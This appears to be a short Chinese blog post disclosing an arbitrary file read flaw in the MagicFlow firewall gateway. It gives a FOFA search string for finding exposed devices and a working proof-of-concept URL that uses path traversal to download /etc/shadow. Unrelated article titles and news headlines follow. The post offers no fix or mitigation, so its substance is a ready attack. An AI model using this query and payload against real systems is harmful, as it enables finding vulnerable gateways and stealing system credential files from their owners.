当前位置: 首页 > news >正文

MagicFlow-防火墙网关-任意文件读取漏洞

news 来源:原创 2025/5/17 21:41:06

漏洞描述:MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件

1.fofa

app="MSA/1.0"

2.漏洞验证

网站页面

构造POC

 /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/shadow

查看下载文件中的内容 

相关文章:

  • 如何面对自己有意识和无意识的逃避(一)
  • c++R 格式
  • 超融合服务器是什么
  • python中使用openssl构建root证书,CSR,并验证
  • Go 语言 fmt 模块的完整方法详解及示例
  • 标星 62.9 万,8 个 yyds 的 GitHub 开源项目 !
  • C++中的std::move函数详解:移动语义与资源管理
  • golang结构体与指针类型
  • ARM day2
  • protobuf为什么快
  • 基于ssm的微博网站(全套)
  • 流量分析2
  • VectorBT:使用PyTorch+LSTM训练和回测股票模型 进阶二
  • 核心知识——论文详解
  • 力扣DAY27 | 热100 | 合并两个有序链表
  • 万字C++STL——vector模拟实现
  • LeetCode 524 通过删除字母匹配到字典里最长单词
  • 虚幻引擎设置复杂碰撞体
  • docker使用uv安装依赖
  • 探索Halo:不止是博客,更是创作新宇宙
  • 上海市第二十届青少年科技节启动:为期半年,推出百余项活动
  • 一旅客因上错车阻挡车门关闭 ,株洲西高铁站发布通报
  • 小米汽车回应部分SU7前保险杠形变
  • 梅花奖在上海|话剧《主角》:艺术与人生的交错
  • 陕西榆林:全力推进榆林学院升格榆林大学
  • 山西临汾哪吒主题景区回应雕塑被指抄袭:造型由第三方公司设计